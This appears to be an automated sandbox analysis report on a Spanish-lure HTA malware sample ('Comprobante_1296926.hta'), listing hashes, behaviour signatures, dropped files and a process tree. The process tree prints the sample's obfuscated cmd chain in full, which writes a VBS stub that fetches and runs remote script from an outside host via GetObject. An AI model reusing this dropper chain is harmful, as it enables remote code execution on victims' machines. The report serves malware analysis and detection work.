Analysis

  • max time kernel
    118s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20230831-es
  • resource tags

    arch:x64arch:x86image:win7-20230831-eslocale:es-esos:windows7-x64systemwindows
  • submitted
    18/09/2023, 16:02

General

  • Target

    Comprobante_1296926.hta

  • Size

    26KB

  • MD5

    15e5781d66044202528f9f4a5af2eef5

  • SHA1

    1bf79e56761c45850c8ea076590074eda11d3e38

  • SHA256

    d873e8acacb72ab8a79133141463b0ccb9a17d948da2865d9045c3e22bed7bf0

  • SHA512

    3cb0e5f8aa054a75e9ecef34648e83dae9377ef554388f0bbc4a07654e2387f5c94d830eb2c31fd0562b02aad4fb18e231fc2a0d6a12cb529c6d652c74cc9c53

  • SSDEEP

    768:CNnHIy4gnvcVbmDth1WPW95DKRfWh2qduHRd2:CNoyBwqP1W+9IRe/duHRd2

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Comprobante_1296926.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2824
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo|set /p=^"s7p=".":szX="i":mni9="g":kqm=":":GetO^">C:\\Users\\Public\\tpk.vbs&echo|set /p=^"bject("sCr"+szX+"pt"+kqm+"hT"+"Tps"+kqm+"//betmaniaplus"+s7p+"com//"+mni9+"1")^">>C:\\Users\\Public\\tpk.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\tpk.vbs
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo"
        3⤵
          PID:2600
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" set /p="s7p=".":szX="i":mni9="g":kqm=":":GetO" 1>C:\\Users\\Public\\tpk.vbs"
          3⤵
            PID:2620
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo"
            3⤵
              PID:2820
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+szX+"pt"+kqm+"hT"+"Tps"+kqm+"//betmaniaplus"+s7p+"com//"+mni9+"1")" 1>>C:\\Users\\Public\\tpk.vbs"
              3⤵
                PID:2752
              • \??\c:\windows\SysWOW64\cmd.exe
                c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\tpk.vbs
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2728
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Public\tpk.vbs"
                  4⤵
                  • Blocklisted process makes network request
                  • Modifies system certificate store
                  PID:2632

          Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                  Filesize

                  304B

                  MD5

                  3ed4677affe7e1cf19563a8ee7a5bdcf

                  SHA1

                  36e7c75db668da32f64ef9b0ca168cbb4e2d96b8

                  SHA256

                  260cd110f1ef04216ade8659f4f87edf1c3c23249ce2e2515f694db26a6b01b3

                  SHA512

                  57177cfbe36c7041cd0a578fb0541f2ad3d16c2fb696a9b502dac59971143385e049683c99243bba9ef59b4baf09b823c07944037f9188de5e286939fc28bab7

                • C:\Users\Admin\AppData\Local\Temp\Cab7A6F.tmp

                  Filesize

                  61KB

                  MD5

                  f3441b8572aae8801c04f3060b550443

                  SHA1

                  4ef0a35436125d6821831ef36c28ffaf196cda15

                  SHA256

                  6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

                  SHA512

                  5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

                • C:\Users\Admin\AppData\Local\Temp\Tar7B6C.tmp

                  Filesize

                  163KB

                  MD5

                  9441737383d21192400eca82fda910ec

                  SHA1

                  725e0d606a4fc9ba44aa8ffde65bed15e65367e4

                  SHA256

                  bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

                  SHA512

                  7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

                • C:\Users\Public\tpk.vbs

                  Filesize

                  37B

                  MD5

                  3f5c063d496110003318f586b96ce8b8

                  SHA1

                  d7d7a25672a8c822527bae09f32c7c3fa399abdf

                  SHA256

                  c322ac3861d5fbd1ed36e588f16f949e35097767873dda743f6bc7b444a2ff98

                  SHA512

                  25fd6667b714a0e6523aaa2c72fddb75eb023ee34ae59749f3b3f8f9e3118728320d2afa642d3167ecca4f79bd997fa18ae1edea0d20d4c53a0d5358f9d3f248

                • C:\Users\Public\tpk.vbs

                  Filesize

                  115B

                  MD5

                  3ac1fe00346022002370d0c49f42a422

                  SHA1

                  bbde71875b8b2a7d437ebcdad956f0ec064046dd

                  SHA256

                  e5f62adcac4e1cf87e2432a0539ee0cf571c9451ec5cfe3b2ac099dbc14a63dd

                  SHA512

                  cd996093b652c309ea60f741a8b0c7ffaa7798e1ae28a5bef642e21052f5e840aa102e70978875469d148da264a9cb465cd506c2741b68842625001fb53ec160